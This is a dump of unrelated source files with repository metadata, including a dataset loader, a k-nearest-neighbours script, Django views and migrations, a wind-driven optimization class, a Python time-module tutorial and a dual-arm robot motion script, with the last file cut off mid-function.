] | |
de5ec83749603d84453db9285e68d7d64b0f4369
|
8edd63a42469bf09fcad1c1070995ceda6e49646
|
/env/lib/python2.7/site-packages/observations/r/phosphate.py
|
6977f1f13f9f2bdb88341269c503dcf9123103b4
|
[] |
no_license
|
silky/bell-ppls
|
fa0b5418f40dab59de48b7220ff30caba5945b56
|
369e7602c810b694a70ac1e875017480c8910ac8
|
refs/heads/master
| 2020-04-06T08:40:28.588492 | 2018-11-01T06:51:33 | 2018-11-01T06:51:33 | 157,312,221 | 1 | 0 | null | 2018-11-13T03:04:18 | 2018-11-13T03:04:18 | null |
UTF-8
|
Python
| false | false | 1,835 |
py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import csv
import numpy as np
import os
import sys
from observations.util import maybe_download_and_extract
def phosphate(path):
"""Phosphate Level Data
Plasma inorganic phosphate levels from 33 subjects.
A data frame with 33 observations on the following 9 variables.
`group`
a factor with levels `control` and `obese`.
`t0`
baseline phosphate level
,
`t0.5`
phosphate level after 1/2 an hour.
`t1`
phosphate level after one an hour.
`t1.5`
phosphate level after 1 1/2 hours.
`t2`
phosphate level after two hours.
`t3`
phosphate level after three hours.
`t4`
phosphate level after four hours.
`t5`
phosphate level after five hours.
C. S. Davis (2002), *Statistical Methods for the Analysis of Repeated
Measurements*, Springer, New York.
Args:
path: str.
Path to directory which either stores file or otherwise file will
be downloaded and extracted there.
Filename is `phosphate.csv`.
Returns:
Tuple of np.ndarray `x_train` with 33 rows and 9 columns and
dictionary `metadata` of column headers (feature names).
"""
import pandas as pd
path = os.path.expanduser(path)
filename = 'phosphate.csv'
if not os.path.exists(os.path.join(path, filename)):
url = 'http://dustintran.com/data/r/HSAUR/phosphate.csv'
maybe_download_and_extract(path, url,
save_file_name='phosphate.csv',
resume=False)
data = pd.read_csv(os.path.join(path, filename), index_col=0,
parse_dates=True)
x_train = data.values
metadata = {'columns': data.columns}
return x_train, metadata
|
[
"[email protected]"
] | |
c733d23c52b223a95360a77acfa2c1924f9cc877
|
9433ce01c6e2906c694b6f0956a4640e1872d4d2
|
/src/main/python/wdbd/codepool/numpy/np_ployfit.py
|
7f5cd81f4002e97e948a3b8be95f2be36410229a
|
[] |
no_license
|
shwdbd/python_codepool
|
fcd7950fc1339994186461ae18c34cee238938ee
|
92a4fb61d060f9a545499b6b7f99a4dc211d5009
|
refs/heads/master
| 2023-02-20T19:49:23.677824 | 2022-06-15T08:53:51 | 2022-06-15T08:53:51 | 209,431,254 | 0 | 1 | null | 2023-02-15T21:58:53 | 2019-09-19T00:56:03 |
Python
|
UTF-8
|
Python
| false | false | 344 |
py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
'''
@File : np_ployfit.py
@Time : 2019/11/06 14:24:55
@Author : Jeffrey Wang
@Version : 1.0
@Contact : [email protected]
@Desc : 拟合函数
1. fit_1z 一阶函数拟合
2. fit_2z 二阶函数拟合
? 如何评价拟合效果
'''
# here put the import lib
|
[
"[email protected]"
] | |
4f933506f4af1143b9acc28db9a09d38ec4467de
|
4eab0329e5bf8b91e3305eaf9202de107cfe889b
|
/notebooks/data8_notebooks/lab04/tests/q2_3.py
|
bd02b5e36213b04e7d67c069acfcddca70a09933
|
[
"MIT",
"BSD-3-Clause"
] |
permissive
|
y1ngyang/jupyterhub_AWS_deployment
|
e638f489ad1b70962204f4355eb2a7c4fc97dc7d
|
8172d63d94894774ec29f427ab5eeec637c923f4
|
refs/heads/master
| 2023-04-15T16:00:11.948307 | 2018-05-18T20:16:37 | 2018-05-18T20:16:37 | 134,009,971 | 0 | 0 |
BSD-3-Clause
| 2023-04-04T00:27:55 | 2018-05-18T22:33:34 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 375 |
py
|
test = {
'name': '',
'points': 1,
'suites': [
{
'cases': [
{
'code': r"""
>>> disemvowel("Datascience rules!") == "Dtscnc rls!"
True
""",
'hidden': False,
'locked': False
},
],
'scored': True,
'setup': '',
'teardown': '',
'type': 'doctest'
}
]
}
|
[
"[email protected]"
] | |
46d07128a604bf41698eb408598644429535db5b
|
77e8b7bc211624687eb61fdb071020642b2c0080
|
/machinelearning/f16.py
|
843de75f00d51c7741c5309feaa61e2e095f6c40
|
[] |
no_license
|
wherby/hackerrank
|
fab46ea208042ce8055c2755545896bf69f88895
|
84345f56690ea6b1d5db181b12d2a2669007456c
|
refs/heads/master
| 2020-09-26T23:53:06.841052 | 2019-09-15T12:11:43 | 2019-09-15T12:11:43 | 67,225,970 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,412 |
py
|
import numpy as np
from math import sqrt
import matplotlib.pyplot as plt
import warnings
from matplotlib import style
from collections import Counter
style.use('fivethirtyeight')
dataset ={'k': [[1,2],[2,3],[3,1]], 'r': [[6,5], [7,7,],[8,6]]}
new_feature = [5,7]
# for i in dataset:
# for ii in dataset[i]:
# plt.scatter(ii[0],ii[1],s =100, color =i)
# [[plt.scatter(ii[0],ii[1],s =100, color =i) for ii in dataset[i]] for i in dataset]
# plt.scatter(new_feature[0], new_feature[1])
# plt.show()
def k_nearest_neighbors(data, predict, k=3):
    """Classify *predict* by majority vote among its k nearest points.

    *data* maps a group label to a list of feature vectors.  Distances
    are Euclidean; the most common label among the k closest points wins.
    """
    if len(data) >= k:
        warnings.warn('k is set to value less than totoal voting groups')
    labeled_distances = []
    for label, points in data.items():
        for point in points:
            dist = np.linalg.norm(np.array(point) - np.array(predict))
            labeled_distances.append([dist, label])
    labeled_distances.sort()
    nearest_labels = [pair[1] for pair in labeled_distances[:k]]
    return Counter(nearest_labels).most_common(1)[0][0]
# Classify the new point and visualize the result.
# Fix vs. original: `print result` is Python 2 statement syntax and a
# SyntaxError in this otherwise Python 3 file (it uses print(...) elsewhere).
result = k_nearest_neighbors(dataset, new_feature, k=3)
print(result)
[[plt.scatter(ii[0], ii[1], s=100, color=i) for ii in dataset[i]] for i in dataset]
plt.scatter(new_feature[0], new_feature[1], color=result)
plt.show()
|
[
"[email protected]"
] | |
b20ca1afe34ac874e9dd05a205c75d038f6ea7b0
|
1ae03694e6826c2c3224647024f66debcebd62dc
|
/matlab/+robust_andrews_kernel/balance_scale/metrics.py
|
d78e052129030ea9de8d3552ad6679f6790d35df
|
[
"Apache-2.0"
] |
permissive
|
Joaggi/Robust-kernels-for-robust-location-estimation
|
5ad7f8f3be9a08e5d4283e03e017e5e3b9b186b8
|
9db62273de90547c982d819dc45e66ac86bfcb58
|
refs/heads/master
| 2023-04-17T22:41:01.652426 | 2022-08-02T23:43:31 | 2022-08-02T23:43:31 | 27,465,913 | 3 | 1 | null | 2022-08-02T23:39:44 | 2014-12-03T02:49:24 |
MATLAB
|
UTF-8
|
Python
| false | false | 686 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Jul 16 15:50:05 2014
@author: Alejandro
"""
import scipy.io as sio
import os, sys
lib_path = os.path.abspath('G:/Dropbox/Universidad/Machine Learning')
sys.path.append(lib_path)
import numpy as np
import Algorithms.Python.Metrics as Metrics
import Robustes.Experiments.metrics_over_labels as metrics_over_labels
dictionary = {
'Kernelconvexnmf':0,
'KernelKMeans':0,
'Kernelseminmfnnls':0,
'Kernelseminmfrule':0,
'KMeans':0,
'NNMF':0,
'RMNMF':1
}
labels_name = 'balance-scale-labels'
metrics_over_labels.metrics('G:/Dropbox/Universidad/Machine Learning/Robustes/BalanceScale/',dictionary,labels_name)
|
[
"[email protected]"
] | |
2277163fb77406568bbbbfd4c43fbc3d8f8704ff
|
583db8851c609f03f722884557cfc67de0ce564e
|
/pysmapi/interfaces/Event_Stream_Add.py
|
8592834aefd487a4a877f75155c9b4f73ace2267
|
[
"Apache-2.0"
] |
permissive
|
lllucius/pysmapi
|
ab0b4409bfda6a61dab7805e2033d71d09a96493
|
c0d802edb58e835e4d48cb9c28ccfccfe5b5c686
|
refs/heads/master
| 2020-04-20T18:07:46.699611 | 2019-06-25T04:27:41 | 2019-06-25T04:27:41 | 169,009,326 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,169 |
py
|
# Copyright 2018-2019 Leland Lucius
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http:#www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import struct
from pysmapi.smapi import *
class Event_Stream_Add(Request):
def __init__(self,
event_info = "",
**kwargs):
super(Event_Stream_Add, self).__init__(**kwargs)
# Request parameters
self._event_info = event_info
@property
def event_info(self):
return self._event_info
@event_info.setter
def event_info(self, value):
self._event_info = value
def pack(self, **kwargs):
# event_info (string,1-maxlength,charNA)
buf = s2b(self._event_info)
return buf
|
[
"[email protected]"
] | |
173d992267a4c50b4df509c54add6f9396d75fbc
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02821/s313302941.py
|
271131d42505bd3b94253e5c4d6e944e2905ed13
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 841 |
py
|
n, m = map(int, input().split())
a = list(map(int, input().split()))
def cumsum(s):
n = len(s)
cs = [0] * (n+1)
for i in range(n):
cs[i+1] = cs[i] + s[i]
return cs
def bs_list(a, f):
l, r = -1, len(a)
while r - l > 1:
x = (l + r) // 2
if f(a[x]): r = x
else: l = x
return None if r == len(a) else r
a.sort()
ca = cumsum(a)
def detect(x):
num = 0
for b in a[::-1]:
res = bs_list(a, lambda y: y >= x - b)
if res is None: break
num += n - res
return num <= m
l, r = -1, 10**5*2+10
while r - l > 1:
x = (l+r) // 2
if detect(x): r = x
else: l = x
s, c = 0, 0
for b in a[::-1]:
res = bs_list(a, lambda x: x >= r - b)
if res is None: break
c += (n - res)
s += b * (n - res) + (ca[n] - ca[res])
print(s + (m - c) * l)
|
[
"[email protected]"
] | |
48029ad550be99084bdc75771e75b28299f992dd
|
8e24e8bba2dd476f9fe612226d24891ef81429b7
|
/geeksforgeeks/python/basic/28_1.py
|
8bba51f3b7f6bc07e66c3cce6c8bb5320e828687
|
[] |
no_license
|
qmnguyenw/python_py4e
|
fb56c6dc91c49149031a11ca52c9037dc80d5dcf
|
84f37412bd43a3b357a17df9ff8811eba16bba6e
|
refs/heads/master
| 2023-06-01T07:58:13.996965 | 2021-06-15T08:39:26 | 2021-06-15T08:39:26 | 349,059,725 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,733 |
py
|
Time Functions in Python | Set 1 (time(), ctime(), sleep()…)
Python has defined a module, “time” which allows us to handle various
operations regarding time, its conversions and representations, which find its
use in various applications in life. The beginning of time is started
measuring from **1 January, 12:00 am, 1970** and this very time is termed as “
**epoch** ” in Python.
**Operations on Time :**
**1\. time()** :- This function is used to count the number of **seconds
elapsed since the epoch**.
**2\. gmtime(sec)** :- This function returns a **structure with 9 values**
each representing a time attribute in sequence. It converts **seconds into
time attributes(days, years, months etc.)** till specified seconds from epoch.
If no seconds are mentioned, time is calculated till present. The structure
attribute table is given below.
Index Attributes Values
0 tm_year 2008
1 tm_mon 1 to 12
2 tm_mday 1 to 31
3 tm_hour 0 to 23
4 tm_min 0 to 59
5 tm_sec 0 to 61 (60 or 61 are leap-seconds)
6 tm_wday 0 to 6
7 tm_yday 1 to 366
8 tm_isdst -1, 0, 1 where -1 means
Library determines DST
__
__
__
__
__
__
__
# Python code to demonstrate the working of
# time() and gmtime()
# importing "time" module for time operations
import time
# using time() to display time since epoch
print ("Seconds elapsed since the epoch are : ",end="")
print (time.time())
# using gmtime() to return the time attribute structure
print ("Time calculated acc. to given seconds is : ")
print (time.gmtime())
---
__
__
Output:
Seconds elapsed since the epoch are : 1470121951.9536893
Time calculated acc. to given seconds is :
time.struct_time(tm_year=2016, tm_mon=8, tm_mday=2,
tm_hour=7, tm_min=12, tm_sec=31, tm_wday=1,
tm_yday=215, tm_isdst=0)
**3\. asctime(“time”)** :- This function takes a time attributed string
produced by gmtime() and returns a **24 character string denoting time**.
**4\. ctime(sec)** :- This function returns a **24 character time string** but
takes seconds as argument and **computes time till mentioned seconds**. If no
argument is passed, time is calculated till present.
__
__
__
__
__
__
__
# Python code to demonstrate the working of
# asctime() and ctime()
# importing "time" module for time operations
import time
# initializing time using gmtime()
ti = time.gmtime()
# using asctime() to display time acc. to time mentioned
print ("Time calculated using asctime() is : ",end="")
print (time.asctime(ti))
# using ctime() to diplay time string using seconds
print ("Time calculated using ctime() is : ", end="")
print (time.ctime())
---
__
__
Output:
Time calculated using asctime() is : Tue Aug 2 07:47:02 2016
Time calculated using ctime() is : Tue Aug 2 07:47:02 2016
**5\. sleep(sec)** :- This method is used to **hault the program execution**
for the time specified in the arguments.
__
__
__
__
__
__
__
# Python code to demonstrate the working of
# sleep()
# importing "time" module for time operations
import time
# using ctime() to show present time
print ("Start Execution : ",end="")
print (time.ctime())
# using sleep() to hault execution
time.sleep(4)
# using ctime() to show present time
print ("Stop Execution : ",end="")
print (time.ctime())
---
__
__
Output:
Start Execution : Tue Aug 2 07:59:03 2016
Stop Execution : Tue Aug 2 07:59:07 2016
This article is contributed by **Manjeet Singh**. If you like GeeksforGeeks
and would like to contribute, you can also write an article using
contribute.geeksforgeeks.org or mail your article to
[email protected]. See your article appearing on the GeeksforGeeks
main page and help other Geeks.
Please write comments if you find anything incorrect, or you want to share
more information about the topic discussed above.
Attention geek! Strengthen your foundations with the **Python Programming
Foundation** Course and learn the basics.
To begin with, your interview preparations Enhance your Data Structures
concepts with the **Python DS** Course.
My Personal Notes _arrow_drop_up_
Save
|
[
"[email protected]"
] | |
45ea3e7d8004d23bd4b5fe78a403b5515a80826a
|
42000e14d25ce3de5b9ba24e3399e67bf88c4ad1
|
/Level_Three/ProTwo/AppTwo/migrations/0001_initial.py
|
db9703f5f9d755c7f363b452bdc1ccaea87e2c26
|
[] |
no_license
|
cdunn6754/Django_Projects
|
0528b3263e2762d0e872686ec5f00a40f3730851
|
545d4e73f05969d1277cacaab2042787676b7e73
|
refs/heads/master
| 2021-09-11T18:21:07.249977 | 2018-04-11T00:06:27 | 2018-04-11T00:06:27 | 110,480,579 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 682 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2018-04-05 00:27
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=264)),
('last_name', models.CharField(max_length=264)),
('email', models.EmailField(max_length=264)),
],
),
]
|
[
"[email protected]"
] | |
ff5481487e54507a28f7f346fc73b088e009771b
|
fcc88521f63a3c22c81a9242ae3b203f2ea888fd
|
/Python3/0006-ZigZag-Conversion/soln.py
|
f2d94cda1de538a16f8a63dbbbb03073bd1a954e
|
[
"MIT"
] |
permissive
|
wyaadarsh/LeetCode-Solutions
|
b5963e3427aa547d485d3a2cb24e6cedc72804fd
|
3719f5cb059eefd66b83eb8ae990652f4b7fd124
|
refs/heads/master
| 2022-12-06T15:50:37.930987 | 2020-08-30T15:49:27 | 2020-08-30T15:49:27 | 291,811,790 | 0 | 1 |
MIT
| 2020-08-31T19:57:35 | 2020-08-31T19:57:34 | null |
UTF-8
|
Python
| false | false | 510 |
py
|
import functools
class Solution:
def convert(self, s, numRows):
"""
:type s: str
:type numRows: int
:rtype: str
"""
if numRows == 1 or len(s) <= numRows:
return s
rows = [[] for _ in range(numRows)]
row, drow = 0, 1
for ch in s:
rows[row].append(ch)
row += drow
if row == 0 or row == numRows - 1:
drow = -drow
return ''.join(functools.reduce(operator.add, rows))
|
[
"[email protected]"
] | |
9f52c25f81a9401c049a07ab2f0d2bf4f56c2f38
|
b87b4f2ad90390e6dcb53f258077ea6fea574f6c
|
/tests/test_models/test_user_model.py
|
86f00ff5b9e2c85d4cf23f0173349b8b234bc5ee
|
[] |
no_license
|
Wassally/backend
|
1b73510ee451d433c1f747be5356c4e11b6e914a
|
01071eb94ecfc3a3b260ae957a0aa638271c66b1
|
refs/heads/master
| 2022-11-26T13:24:01.684833 | 2019-06-30T06:02:29 | 2019-06-30T06:02:29 | 177,253,039 | 2 | 0 | null | 2022-11-22T03:30:11 | 2019-03-23T06:29:15 |
Python
|
UTF-8
|
Python
| false | false | 805 |
py
|
from django.test import TestCase
from api.factories import ClientFactory, CaptainFactory
from api.models import User, Captain
class ClientTest(TestCase):
def test_creation_client(self):
client = ClientFactory()
self.assertTrue(isinstance(client, User))
self.assertEqual(
client.__str__(),
"%d: %s" % (client.id, client.username)
)
self.assertTrue(client.is_client)
self.assertFalse(client.is_captain)
class CaptainTest(TestCase):
def test_creation_captain(self):
captain = CaptainFactory()
self.assertTrue(isinstance(captain, Captain))
self.assertEqual(captain.__str__(), captain.user.username)
self.assertTrue(captain.user.is_captain)
self.assertFalse(captain.user.is_client)
|
[
"[email protected]"
] | |
b036d6fd8e95f539ae982a23cf985148ad491aca
|
bcabce262e54a6ac38948a4717254cdc3ce65874
|
/mealpy/physics_based/WDO.py
|
3e376916b7ec257ba7469ad4a3260e10a7cdabce
|
[
"MIT"
] |
permissive
|
ibrahim85/MEta-heuristics-ALgorithms-in-PYthon
|
4ab6e6ef54127b6f4721178a1f855d1be91f9b42
|
47fb428e8378fc52cd5fe6eff20cec1c68ba5039
|
refs/heads/master
| 2023-06-03T05:23:31.993100 | 2021-06-28T14:48:38 | 2021-06-28T14:48:38 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,794 |
py
|
#!/usr/bin/env python
# ------------------------------------------------------------------------------------------------------%
# Created by "Thieu Nguyen" at 21:18, 17/03/2020 %
# %
# Email: [email protected] %
# Homepage: https://www.researchgate.net/profile/Thieu_Nguyen6 %
# Github: https://github.com/thieu1995 %
#-------------------------------------------------------------------------------------------------------%
from numpy.random import uniform, randint
from numpy import ones, clip
from mealpy.root import Root
class BaseWDO(Root):
"""
The original version of : Wind Driven Optimization (WDO)
The Wind Driven Optimization Technique and its Application in Electromagnetics
Link:
https://ieeexplore.ieee.org/abstract/document/6407788
"""
def __init__(self, obj_func=None, lb=None, ub=None, verbose=True, epoch=750, pop_size=100,
RT=3, g=0.2, alp=0.4, c=0.4, max_v=0.3, **kwargs):
super().__init__(obj_func, lb, ub, verbose, kwargs)
self.epoch = epoch
self.pop_size = pop_size
self.RT = RT # RT coefficient
self.g = g # gravitational constant
self.alp = alp # constants in the update equation
self.c = c # coriolis effect
self.max_v = max_v # maximum allowed speed
def train(self):
"""
# pop is the set of "air parcel" - "position"
# air parcel: is the set of gas atoms . Each atom represents a dimension in position and has its own velocity
# pressure represented by fitness value
"""
pop = [self.create_solution() for _ in range(self.pop_size)]
g_best = self.get_global_best_solution(pop, self.ID_FIT, self.ID_MIN_PROB)
list_velocity = self.max_v * uniform(self.lb, self.ub, (self.pop_size, self.problem_size))
for epoch in range(self.epoch):
# Update velocity based on random dimensions and position of global best
for i in range(self.pop_size):
rand_dim = randint(0, self.problem_size)
temp = list_velocity[i][rand_dim] * ones(self.problem_size)
vel = (1 - self.alp)*list_velocity[i] - self.g * pop[i][self.ID_POS] + \
(1 - 1.0/(i+1)) * self.RT * (g_best[self.ID_POS] - pop[i][self.ID_POS]) + self.c * temp / (i+1)
vel = clip(vel, -self.max_v, self.max_v)
# Update air parcel positions, check the bound and calculate pressure (fitness)
pos = pop[i][self.ID_POS] + vel
pos = self.amend_position_faster(pos)
fit = self.get_fitness_position(pos)
pop[i] = [pos, fit]
list_velocity[i] = vel
## batch size idea
if self.batch_idea:
if (i + 1) % self.batch_size == 0:
g_best = self.update_global_best_solution(pop, self.ID_MIN_PROB, g_best)
else:
if (i + 1) % self.pop_size == 0:
g_best = self.update_global_best_solution(pop, self.ID_MIN_PROB, g_best)
self.loss_train.append(g_best[self.ID_FIT])
if self.verbose:
print(">Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT]))
self.solution = g_best
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
|
[
"[email protected]"
] | |
4ad8ad1fbd7235c212a139cdeafe67ce534debf4
|
afc8d5a9b1c2dd476ea59a7211b455732806fdfd
|
/Configurations/WH_chargeAsymmetry/WH3l/Full2018_v7/structure.py
|
6388a09a0a8e38670a88995180d3619b60830e60
|
[] |
no_license
|
latinos/PlotsConfigurations
|
6d88a5ad828dde4a7f45c68765081ed182fcda21
|
02417839021e2112e740607b0fb78e09b58c930f
|
refs/heads/master
| 2023-08-18T20:39:31.954943 | 2023-08-18T09:23:34 | 2023-08-18T09:23:34 | 39,819,875 | 10 | 63 | null | 2023-08-10T14:08:04 | 2015-07-28T07:36:50 |
Python
|
UTF-8
|
Python
| false | false | 2,018 |
py
|
# structure configuration for datacard
#structure = {}
# keys here must match keys in samples.py
#
structure['Fake'] = {
'isSignal' : 0,
'isData' : 0
}
#structure['DY'] = {
# 'isSignal' : 0,
# 'isData' : 0
# }
#
#structure['top'] = {
# 'isSignal' : 0,
# 'isData' : 0
# }
structure['WW'] = {
'isSignal' : 0,
'isData' : 0
}
structure['ggWW'] = {
'isSignal' : 0,
'isData' : 0
}
structure['Wg'] = {
'isSignal' : 0,
'isData' : 0
}
structure['WgS'] = {
'isSignal' : 0,
'isData' : 0
}
structure['Zg'] = {
'isSignal' : 0,
'isData' : 0
}
structure['ZgS'] = {
'isSignal' : 0,
'isData' : 0
}
structure['Vg'] = {
'isSignal' : 0,
'isData' : 0
}
structure['VgS'] = {
'isSignal' : 0,
'isData' : 0
}
structure['WZ'] = {
'isSignal' : 0,
'isData' : 0
}
structure['VVV'] = {
'isSignal' : 0,
'isData' : 0
}
structure['ZZ'] = {
'isSignal' : 0,
'isData' : 0
}
structure['ggH_hww'] = {
'isSignal' : 1,
'isData' : 0
}
structure['qqH_hww'] = {
'isSignal' : 1,
'isData' : 0
}
structure['WH_hww_plus'] = {
'isSignal' : 1,
'isData' : 0
}
structure['WH_hww_minus'] = {
'isSignal' : 1,
'isData' : 0
}
structure['ZH_hww'] = {
'isSignal' : 1,
'isData' : 0
}
structure['ttH_hww'] = {
'isSignal' : 1,
'isData' : 0
}
structure['ggZH_hww'] = {
'isSignal' : 1,
'isData' : 0
}
structure['ggH_htt'] = {
'isSignal' : 1,
'isData' : 0,
}
structure['qqH_htt'] = {
'isSignal' : 1,
'isData' : 0,
}
structure['WH_htt_plus'] = {
'isSignal' : 1,
'isData' : 0,
}
structure['WH_htt_minus'] = {
'isSignal' : 1,
'isData' : 0,
}
structure['ZH_htt'] = {
'isSignal' : 1,
'isData' : 0,
}
# data
structure['DATA'] = {
'isSignal' : 0,
'isData' : 1
}
|
[
"[email protected]"
] | |
ee93303355c66a20ff5ffdd32b3ebf107b00bc0e
|
f5f7a1ae04a999f3f193cca647397b29806edf73
|
/0000_examples/ur3_dual_interpolation_exe.py
|
09b091f802f3706ab9fd2e03f1068f6f58440932
|
[
"MIT"
] |
permissive
|
kazuki0824/wrs
|
bf88d1568f591c61870332436bfcd079d78b87d7
|
03c9e59779a30e2f6dedf2732ad8a46e6ac3c9f0
|
refs/heads/main
| 2023-07-24T05:20:02.054592 | 2021-05-31T14:38:18 | 2021-05-31T14:38:18 | 368,829,423 | 1 | 0 |
MIT
| 2021-05-19T10:25:48 | 2021-05-19T10:25:47 | null |
UTF-8
|
Python
| false | false | 1,191 |
py
|
import math
import numpy as np
import robot_con.ur.ur3_dual_x as u3r85dx
rbtx = u3r85dx.UR3DualX(lft_robot_ip='10.2.0.50', rgt_robot_ip='10.2.0.51', pc_ip='10.2.0.101')
# left randomization
current_lft_jnt_values = rbtx.lft_arm_hnd.get_jnt_values()
n_lft_jnt_values = (current_lft_jnt_values + (np.random.rand(6) - .5) * 1 / 12 * math.pi).tolist()
nn_lft_jnt_values = (n_lft_jnt_values + (np.random.rand(6) - .5) * 1 / 12 * math.pi).tolist()
nnn_lft_jnt_values = (nn_lft_jnt_values + (np.random.rand(6) - .5) * 1 / 12 * math.pi).tolist()
# right randomization
current_rgt_jnt_values = rbtx.rgt_arm_hnd.get_jnt_values()
n_rgt_jnt_values = (current_rgt_jnt_values + (np.random.rand(6) - .5) * 1 / 12 * math.pi).tolist()
nn_rgt_jnt_values = (n_rgt_jnt_values + (np.random.rand(6) - .5) * 1 / 12 * math.pi).tolist()
nnn_rgt_jnt_values = (nn_rgt_jnt_values + (np.random.rand(6) - .5) * 1 / 12 * math.pi).tolist()
rbtx.move_jspace_path([current_lft_jnt_values + current_rgt_jnt_values,
n_lft_jnt_values + n_rgt_jnt_values,
nn_lft_jnt_values + nn_rgt_jnt_values,
nnn_lft_jnt_values + nnn_rgt_jnt_values], control_frequency=0.05)
|
[
"[email protected]"
] | |
1298229e6667d5b56fca496bd5b6d2adb592dec4
|
98c6ea9c884152e8340605a706efefbea6170be5
|
/examples/data/Assignment_1/kdsjor001/question2.py
|
b192808bc1bd49a030995b7d46e982d2aaa24594
|
[] |
no_license
|
MrHamdulay/csc3-capstone
|
479d659e1dcd28040e83ebd9e3374d0ccc0c6817
|
6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2
|
refs/heads/master
| 2021-03-12T21:55:57.781339 | 2014-09-22T02:22:22 | 2014-09-22T02:22:22 | 22,372,174 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 232 |
py
|
a=eval(input('Enter the hours:\n'))
b=eval(input('Enter the minutes:\n'))
c=eval(input('Enter the seconds:\n'))
if 0<=a<=23 and 0<=b<=59 and 0<=c<=59:
print ('Your time is valid.')
else:
print ('Your time is invalid.')
|
[
"[email protected]"
] | |
40f756004da71f05733139a24309c3462c7ec54b
|
43d4b962a83dac734dfb09b8523fdfcfcc6628c1
|
/lavajato_fornecedor/views.py
|
c245e3d77cf35444022eb95c2347a0cc74207d4f
|
[] |
no_license
|
redcliver/sistemas
|
01edd98c2814eee50550010169b2c7594e5256f5
|
1129c9516c57fbf53ce3cf5e0e5feb3835d3e9df
|
refs/heads/master
| 2020-04-07T17:23:04.809752 | 2019-05-02T16:24:18 | 2019-05-02T16:24:18 | 158,567,651 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,460 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render
from .models import fornecedor
# Create your views here.
def lavajato_fornecedor(request):
if request.user.is_authenticated():
empresa = request.user.get_short_name()
if empresa == 'dayson':
if request.method == 'POST' and request.POST.get('nome') != None:
name = request.POST.get('nome')
telefone = request.POST.get('tel')
celular = request.POST.get('cel')
cpf = request.POST.get('cpf')
email = request.POST.get('mail')
endereco = request.POST.get('endereco')
numero = request.POST.get('numero')
bairro = request.POST.get('bairro')
cidade = request.POST.get('cidade')
uf_cidade = request.POST.get('uf_cidade')
novo_fornecedor = fornecedor(nome=name, telefone=telefone, celular=celular, cpf=cpf, email=email, endereco=endereco, numero=numero, bairro=bairro, cidade=cidade, uf_cidade=uf_cidade)
novo_fornecedor.save()
msg = name+" salvo com sucesso!"
return render(request, 'lavajato_fornecedor/fornecedor_novo.html', {'title':'Novo Fornecedor','msg':msg})
return render(request, 'lavajato_fornecedor/fornecedor_novo.html', {'title':'Novo Fornecedor'})
return render(request, 'sistema_login/erro.html', {'title':'Erro'})
else:
return render(request, 'sistema_login/erro.html', {'title':'Erro'})
def busca(request):
if request.user.is_authenticated():
empresa = request.user.get_short_name()
if empresa == 'dayson':
fornecedores = fornecedor.objects.all().order_by('nome')
if request.method == 'POST' and request.POST.get('fornecedor_id') != None:
fornecedor_id = request.POST.get('fornecedor_id')
fornecedor_obj = fornecedor.objects.get(id=fornecedor_id)
return render(request, 'lavajato_fornecedor/fornecedor_visualiza.html', {'title':'Visualizar Fornecedor', 'fornecedor_obj':fornecedor_obj})
return render(request, 'lavajato_fornecedor/fornecedor_busca.html', {'title':'Buscar Fornecedor', 'fornecedores':fornecedores})
return render(request, 'sistema_login/erro.html', {'title':'Erro'})
else:
return render(request, 'sistema_login/erro.html', {'title':'Erro'})
def edita(request):
if request.user.is_authenticated():
empresa = request.user.get_short_name()
if empresa == 'dayson':
fornecedores = fornecedor.objects.all().order_by('nome')
if request.method == 'POST' and request.POST.get('fornecedor_id') != None:
fornecedor_id = request.POST.get('fornecedor_id')
fornecedor_obj = fornecedor.objects.get(id=fornecedor_id)
return render(request, 'lavajato_fornecedor/fornecedor_edita.html', {'title':'Editar Fornecedor', 'fornecedor_obj':fornecedor_obj})
return render(request, 'lavajato_fornecedor/fornecedor_busca_edita.html', {'title':'Editar Fornecedor', 'fornecedores':fornecedores})
return render(request, 'sistema_login/erro.html', {'title':'Erro'})
else:
return render(request, 'sistema_login/erro.html', {'title':'Erro'})
def salva(request):
if request.user.is_authenticated():
empresa = request.user.get_short_name()
if empresa == 'dayson':
fornecedores = fornecedor.objects.all().order_by('nome')
if request.method == 'POST' and request.POST.get('fornecedor_id') != None:
fornecedor_id = request.POST.get('fornecedor_id')
fornecedor_obj = fornecedor.objects.get(id=fornecedor_id)
nome = request.POST.get('nome')
tel = request.POST.get('tel')
cel = request.POST.get('cel')
cpf = request.POST.get('cpf')
mail = request.POST.get('mail')
endereco = request.POST.get('endereco')
